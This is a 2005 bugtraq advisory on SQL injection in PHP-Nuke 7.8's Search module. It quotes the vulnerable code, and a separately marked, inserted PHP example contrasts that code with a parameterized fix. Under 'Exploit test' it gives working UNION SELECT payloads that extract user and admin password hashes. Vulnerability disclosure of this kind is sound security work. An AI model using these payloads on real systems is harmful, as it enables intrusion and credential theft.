List: bugtraq
Subject: Critical SQL Injection PHPNuke <= 7.8
From: sp3x () securityreason ! com
Date: 2005-11-15 14:23:17
Message-ID: 20051115142317.7593.qmail () securityfocus ! com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SecurityAlert SA027
Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005
Affected software :
===================
PHPNuke version : 7.8 with all security fixes/patches
Not Affected software :
=======================
PHPNuke version : 7.9 + patch 3.1
Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with a users system. Each user can submit comments to discuss the articles, similar to Slashdot and many others. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referers page to know who links to us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires the Apache Web server, PHP and a SQL database (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support for 25 languages, Yahoo-like search engine, comments option in polls, lots of themes, Ephemerids manager, File Manager, Headlines, download manager, FAQ manager, advanced blocks system, reviews system, newsletter, categorized articles, multilanguage content management, phpBB Forums included and a lot more.
Vulnerabilities :
*****************
Critical SQL injection :
==========================
In the module called "Search" there is a SQL injection bug, which can lead to the theft of the admin's username and MD5 password hash, and of other sensitive data from the database.
The problem exists in index.php, so first let's look at the source code of this file.
Original code from index.php :
---------------------------------
...
// check_html() only strips HTML; stripslashes() then removes the backslashes that escape quotes
$query = stripslashes(check_html($query, "nohtml"));
if ($type=="stories" OR !$type) {
    if ($category > 0) {
        $categ = "AND catid='$category' ";
    } else {
        $categ = "";
    }
    $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where s.aid=a.aid $queryalang $categ";
    // $query is interpolated into the SQL text without any escaping
    if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%') ";
    if (!empty($author)) $q .= "AND s.aid='$author' ";
    if (!empty($topic)) $q .= "AND s.topic='$topic' ";
    if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
    $q .= " ORDER BY s.time DESC LIMIT $min,$offset";
    $t = $topic;
    $result5 = $db->sql_query($q);
    $nrows = $db->sql_numrows($result5);
....
-----------------------------------
Here we can see that stripslashes() is used on the $query variable.
Using stripslashes() before the MySQL statement leads to a critical SQL injection attack: stripslashes() removes the backslashes that escape quote characters, so a single quote in the search term reaches the query unescaped and terminates the LIKE string literal.
This SQL injection will work in every type of search.
Here I mean:
type=="stories"
type=="comments"
type=="reviews"
type=="users"
And it will also work when is_active("Downloads"), is_active("Web_Links") or is_active("Encyclopedia") is true.
So we have here about 7 critical SQL injections.
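The same query-building step written two ways, as an added example that is not code from this advisory or from PHP-Nuke: the vulnerable pattern of the excerpt above (stripslashes() on the search term, then string interpolation into the SQL) next to a hardened form that sends the term as a bound PDO parameter and escapes LIKE wildcards. The table and column names follow the excerpt; the function names, the $pdo connection and the sample rows are assumptions made for the demonstration.

```php
<?php
// Added example, not PHP-Nuke code. build_vulnerable_query() mirrors the
// index.php excerpt; search_stories() is a hypothetical hardened replacement.
// The $pdo connection and the table layout are assumed for the demonstration.

// Vulnerable pattern: the search term becomes part of the SQL text.
// Under magic_quotes_gpc the input arrives as  x\'  and stripslashes()
// turns it back into  x'  , so the quote closes the LIKE literal early.
function build_vulnerable_query(string $prefix, string $query): string
{
    $query = stripslashes($query);
    return "SELECT s.sid, s.title FROM {$prefix}_stories s "
         . "WHERE (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%') "
         . "ORDER BY s.time DESC";
}

// Hardened form: the SQL text is fixed; the term travels as a bound value,
// and LIKE metacharacters in it are escaped so they match literally.
function search_stories(PDO $pdo, string $prefix, string $query, int $min = 0, int $offset = 10): array
{
    // $prefix comes from configuration, not the user; still restrict it to a safe charset.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // '!' is declared as the ESCAPE character below; this avoids the differing
    // backslash rules of MySQL and SQLite string literals.
    $term = '%' . strtr($query, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';

    // Two placeholders for the same value: some drivers reject reusing one name.
    $sql = "SELECT s.sid, s.title FROM {$prefix}_stories s "
         . "WHERE s.title LIKE :t1 ESCAPE '!' OR s.hometext LIKE :t2 ESCAPE '!' "
         . "ORDER BY s.time DESC LIMIT :min, :cnt";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':t1', $term, PDO::PARAM_STR);
    $stmt->bindValue(':t2', $term, PDO::PARAM_STR);
    $stmt->bindValue(':min', $min, PDO::PARAM_INT);    // row offset ($min in the excerpt)
    $stmt->bindValue(':cnt', $offset, PDO::PARAM_INT); // row count ($offset in the excerpt)
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration on an in-memory SQLite database with constructed rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE nuke_stories (sid INTEGER, title TEXT, hometext TEXT, time TEXT)");
$pdo->exec("INSERT INTO nuke_stories VALUES (1, 'Hello world', 'first story', '2005-11-15')");
$pdo->exec("INSERT INTO nuke_stories VALUES (2, '100% natural', 'second story', '2005-11-14')");

// What magic_quotes_gpc would hand the script for the input  x' OR 1=1
$gpc = "x\\' OR 1=1";
// The quote survives into the SQL text:  ... LIKE '%x' OR 1=1%' ...
echo build_vulnerable_query('nuke', $gpc), "\n";

// Bound as data, the same term matches nothing and alters no SQL.
var_dump(count(search_stories($pdo, 'nuke', stripslashes($gpc))));  // int(0)
// A '%' in the term is matched literally instead of acting as a wildcard.
var_dump(count(search_stories($pdo, 'nuke', '100%')));              // int(1)
```

The hardened function still strips slashes if the platform adds them, but the protection comes from the binding, not from any escaping of the value: whatever the term contains, the statement text the database parses never changes.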
Exploit test :
--------------
Enter this into the Search field :
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*   -> users' passwords and logins
s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*   -> nuke_authors passwords and logins
Exploit :
---------
http://securityreason.com/achievement_exploitalert/5
How to fix :
============
Download the new version of the script, or apply the update:
http://securityreason.com/patch/6
Greets :
========
Special greets : cXIb8O3, pkw, pi3, p_e_a and others.
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)
iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU
yDQ955aOQpjnDMqXPvClE/I=
=+sx9
-----END PGP SIGNATURE-----